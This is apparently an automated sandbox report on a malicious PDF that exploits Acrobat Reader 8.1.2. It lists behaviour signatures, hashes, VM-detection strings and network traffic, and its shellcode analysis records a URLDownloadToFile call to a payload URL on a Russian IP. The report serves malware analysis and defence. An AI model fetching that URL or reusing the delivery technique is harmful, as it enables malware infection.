
General Information

Analysis ID: 27417
Start time: 15:14:04
Start date: 16/11/2012
Overall analysis duration: 0h 3m 32s
Sample file name: 58fdd7befdcfcfca285543d6e0c0da0f.pdf
Cookbook file name: Ret Dump.jbs
Analysis system description: XP SP3 (Office 2003 SP1, Java 1.5.0, Acrobat Reader 8.1.2, Internet Explorer 6, Flash 10.1.82.76)
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
SCAE enabled: true
SCAE success: false, ratio: 0%

Classification / Threat Score

Persistence, Installation, Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:

Matching Signatures

Behavior Signatures
Creates temporary files
Reads ini files
URLs found in memory or binary data
Creates mutexes: \BaseNamedObjects\oleacc-msaa-loaded, \BaseNamedObjects\Global\AcrobatViewerIsRunning
Downloads files from webservers via HTTP
Found strings which match to known bank urls
Found strings which match to known social media urls
May have tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Detected shellcode (check out the disassembly section)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (performs HTTP gets)
Document exploit detected (unknown TCP traffic)
NOP-sled detected (often used during heap spraying before exploitation)

Code Signatures
Contains functionality to download additional files from the internet

Startup

  • system is xp2
  • AcroRd32.exe (PID: 1776 MD5: 80660C611B596FFE8AF4074B31AA6FB7)
  • cleanup

Created / dropped Files

File Path | MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AcrD8AE.tmp | C046CC90363EBD2C6F80E2E7F8C7793D

Contacted Domains

No contacted domains info

Contacted IPs

IP | Country | Pingable | Open Ports
79.137.237.66 | RUSSIAN FEDERATION | false | (none listed)

Static File Info

File type: PDF document, version 1.6
File name: 58fdd7befdcfcfca285543d6e0c0da0f.pdf
File size: 13252
MD5: 58fdd7befdcfcfca285543d6e0c0da0f
SHA1: babce866503fbe880cdcf38f39b890ac612e6722
SHA256: b492d1b032814ab0904f24aecb9d14bb159fe77f457e23e250a859158284b240
SHA512: d8a2728715cc51e8affeaa6dcddc605c8c16c2abbfa32b1245a703df94cf8aad8c99e13c32b558acb18747e63e0810f33a91cabb12d5e4c10d558f456e795fff

String Analysis

URLs
String value | Source
Bank names
String value | Source
Social media names

String value | Source
Don't show againSave a Blank Copy of this FormData typed into this form will not be saved. Adobe Reader can only save a blank copy of this form.Save a Blank CopyPlease print your completed form if you would like a copy for your records.The document you are saving is a blank copy of your form. This blank copy does not contain any information you may have typed into the form.CancelOKContinueEmail a Blank Copy of this FormThe email method you just chose will email a blank copy of this form. The blank copy will not contain any data you may have typed into this form.Email a Blank CopyThis form contains an email submit button, located on the form. Clicking this email submit button will email a data file containing data you type into this form.blankcopySelect Email ClientPlease indicate the option which best describes how you send mail.Desktop Email ApplicationChoose this option if you currently use an email application such as Microsoft Outlook Express, Microsoft Outlook, Eudora, or Mail.Internet EmailChoose this option if you currently use an Internet email service such as Yahoo or Microsoft Hotmail.OtherChoose this option if your preferred desktop email application is not available or you do not know which option to choose.PrintHelpNon-interactive for commentingSave for commentingSave a non-interactive copy of the form for commentin equals www.hotmail.com (Hotmail) | AcroRd32.exe
Don't show againSave a Blank Copy of this FormData typed into this form will not be saved. Adobe Reader can only save a blank copy of this form.Save a Blank CopyPlease print your completed form if you would like a copy for your records.The document you are saving is a blank copy of your form. This blank copy does not contain any information you may have typed into the form.CancelOKContinueEmail a Blank Copy of this FormThe email method you just chose will email a blank copy of this form. The blank copy will not contain any data you may have typed into this form.Email a Blank CopyThis form contains an email submit button, located on the form. Clicking this email submit button will email a data file containing data you type into this form.blankcopySelect Email ClientPlease indicate the option which best describes how you send mail.Desktop Email ApplicationChoose this option if you currently use an email application such as Microsoft Outlook Express, Microsoft Outlook, Eudora, or Mail.Internet EmailChoose this option if you currently use an Internet email service such as Yahoo or Microsoft Hotmail.OtherChoose this option if your preferred desktop email application is not available or you do not know which option to choose.PrintHelpNon-interactive for commentingSave for commentingSave a non-interactive copy of the form for commentin equals www.yahoo.com (Yahoo) | AcroRd32.exe
http://cdn.api.twitter.com/1/urls/count.json?url=http%3A%2F%2Fwww.oldapps.com%2F&callback=twttr.receiveCou equals www.twitter.com (Twitter) | AcroRd32.exe
http://connect.facebook.net/en_US/all. equals www.facebook.com (Facebook) | AcroRd32.exe
http://platform.twitter.com/js/xd/jsonrpc. equals www.twitter.com (Twitter) | AcroRd32.exe
http://platform.twitter.com/js/xd/parent. equals www.twitter.com (Twitter) | AcroRd32.exe
http://platform.twitter.com/widgets. equals www.twitter.com (Twitter) | AcroRd32.exe
http://platform.twitter.com/widgets/hub.ht equals www.twitter.com (Twitter) | AcroRd32.exe
http://platform.twitter.com/widgets/images/tweet.dfbf1dd98bad9f5b5addd80494650dca.p equals www.twitter.com (Twitter) | AcroRd32.exe
http://platform.twitter.com/widgets/tweet_button.ht equals www.twitter.com (Twitter) | AcroRd32.exe
VM Artifacts

String value | Source
\??\C:\WINDOWS\system32\VBoxService.e | AcroRd32.exe
\??\C:\WINDOWS\system32\VBoxTray.e | AcroRd32.exe

Network Behavior

TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2012 15:15:26.984139919 CET | 1099 | 80 | 192.168.0.13 | 79.137.237.66
Nov 16, 2012 15:15:26.984169006 CET | 80 | 1099 | 79.137.237.66 | 192.168.0.13
Nov 16, 2012 15:15:26.984507084 CET | 1099 | 80 | 192.168.0.13 | 79.137.237.66
Nov 16, 2012 15:15:27.254940033 CET | 1099 | 80 | 192.168.0.13 | 79.137.237.66
Nov 16, 2012 15:15:27.254960060 CET | 80 | 1099 | 79.137.237.66 | 192.168.0.13
Nov 16, 2012 15:15:34.934161901 CET | 80 | 1099 | 79.137.237.66 | 192.168.0.13
Nov 16, 2012 15:15:34.934714079 CET | 1099 | 80 | 192.168.0.13 | 79.137.237.66
Nov 16, 2012 15:15:35.196383953 CET | 1099 | 80 | 192.168.0.13 | 79.137.237.66
Nov 16, 2012 15:15:35.196402073 CET | 80 | 1099 | 79.137.237.66 | 192.168.0.13
HTTP Request Dependency Graph
  • 79.137.237.66
HTTP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transferred (KB)
Nov 16, 2012 15:15:27.254940033 CET | 1099 | 80 | 192.168.0.13 | 79.137.237.66 | (header below) | 0

GET /a.php?f=21&e=4 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 79.137.237.66
Connection: Keep-Alive

Code Manipulation Behavior

System Behavior

General
Start time:10:12:44
Start date:24/01/2012
Path:C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:341616 bytes
MD5 hash:80660C611B596FFE8AF4074B31AA6FB7

Disassembly

Shellcode Analysis

APIs
  • LoadLibraryA.KERNEL32, ref: 02F900D2
  • URLDownloadToFileA.URLMON, ref: 02F90139
  • TerminateThread.KERNEL32, ref: 02F90166
Address | Value
2f90186 | http://79.137.237.66/a.php?f=21&e=4

Code Analysis